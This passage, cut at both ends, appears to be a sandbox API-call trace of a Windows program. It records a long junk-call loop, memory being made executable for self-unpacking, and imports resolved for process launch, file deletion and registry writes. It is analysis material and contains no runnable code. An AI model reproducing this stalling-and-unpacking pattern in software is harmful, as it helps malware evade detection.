nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.385] AddAtomA (lpString=0x0) returned 0x0 [0077.385] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.385] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.385] AddAtomA (lpString=0x0) returned 0x0 [0077.385] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.385] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.385] AddAtomA (lpString=0x0) returned 0x0 [0077.385] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.385] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.385] AddAtomA (lpString=0x0) returned 0x0 [0077.385] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.385] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.385] AddAtomA (lpString=0x0) returned 0x0 [0077.385] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.385] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.385] AddAtomA (lpString=0x0) returned 0x0 [0077.385] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.386] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.386] AddAtomA (lpString=0x0) returned 0x0 [0077.386] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.387] AddAtomA (lpString=0x0) returned 0x0 [0077.387] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.387] AddAtomA (lpString=0x0) returned 0x0 [0077.387] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.387] AddAtomA (lpString=0x0) returned 0x0 [0077.387] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.387] AddAtomA (lpString=0x0) returned 0x0 [0077.387] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.387] AddAtomA (lpString=0x0) returned 0x0 [0077.387] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.387] AddAtomA (lpString=0x0) returned 0x0 [0077.387] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.387] AddAtomA (lpString=0x0) returned 0x0 [0077.387] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.387] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.388] AddAtomA (lpString=0x0) returned 0x0 [0077.388] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.388] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.389] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.389] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.389] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.389] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.389] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.389] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.389] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.389] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.389] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.389] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.389] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.389] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.389] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.389] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.389] AddAtomA (lpString=0x0) returned 0x0 [0077.390] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.390] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.390] AddAtomA (lpString=0x0) returned 0x0 [0077.390] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.390] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.390] AddAtomA (lpString=0x0) returned 0x0 [0077.390] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.390] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.390] AddAtomA (lpString=0x0) returned 0x0 [0077.390] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.390] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.390] AddAtomA (lpString=0x0) returned 0x0 [0077.390] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.390] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.390] AddAtomA (lpString=0x0) returned 0x0 [0077.390] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.390] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.390] AddAtomA (lpString=0x0) returned 0x0 [0077.390] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.390] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.390] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.391] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.391] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.391] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.391] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.391] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.391] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.391] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.391] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.391] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.391] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.391] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.391] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.391] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.391] AddAtomA (lpString=0x0) returned 0x0 [0077.391] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.392] AddAtomA (lpString=0x0) returned 0x0 [0077.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.392] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.393] AddAtomA (lpString=0x0) returned 0x0 [0077.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.393] AddAtomA (lpString=0x0) returned 0x0 [0077.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.393] AddAtomA (lpString=0x0) returned 0x0 [0077.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.393] AddAtomA (lpString=0x0) returned 0x0 [0077.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.393] AddAtomA (lpString=0x0) returned 0x0 [0077.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.413] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0077.413] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0077.413] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0077.413] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0077.413] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0077.413] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0077.413] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0077.414] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0077.414] SetErrorMode (uMode=0x400) returned 0x0 [0077.414] SetErrorMode (uMode=0x0) returned 0x400 [0077.414] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0077.414] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0077.417] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0077.521] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.616] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0077.616] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0077.617] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0077.618] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0077.618] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0077.631] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0077.631] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0077.631] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0077.631] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0077.631] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0077.632] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0077.633] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.634] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0077.635] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0077.636] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0077.637] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0077.637] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0077.637] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0077.637] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0077.637] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0077.637] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0077.637] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0077.638] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0077.638] GetProcAddress (hModule=0x754b0000, lpProcName="RegCreateKeyExW") returned 0x754c40fe [0077.638] GetProcAddress (hModule=0x754b0000, lpProcName="SetSecurityDescriptorDacl") returned 0x754c415e [0077.638] GetProcAddress (hModule=0x754b0000, lpProcName="InitializeSecurityDescriptor") returned 0x754c4620 [0077.638] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0077.638] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0077.639] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0077.639] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0077.639] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0077.639] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0077.639] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0077.639] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0077.640] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0077.640] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0077.645] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0077.645] atexit (param_1=0x6463d8) returned 0 [0077.680] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x9d75b520, dwHighDateTime=0x1d5d6b4)) [0077.680] GetCurrentThreadId () returned 0x8f4 [0077.680] GetCurrentProcessId () returned 0x8e4 [0077.680] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=21895448361) returned 1 [0077.681] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0077.682] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.682] GetLastError () returned 0x57 [0077.683] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.683] GetLastError () returned 0x57 [0077.683] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) 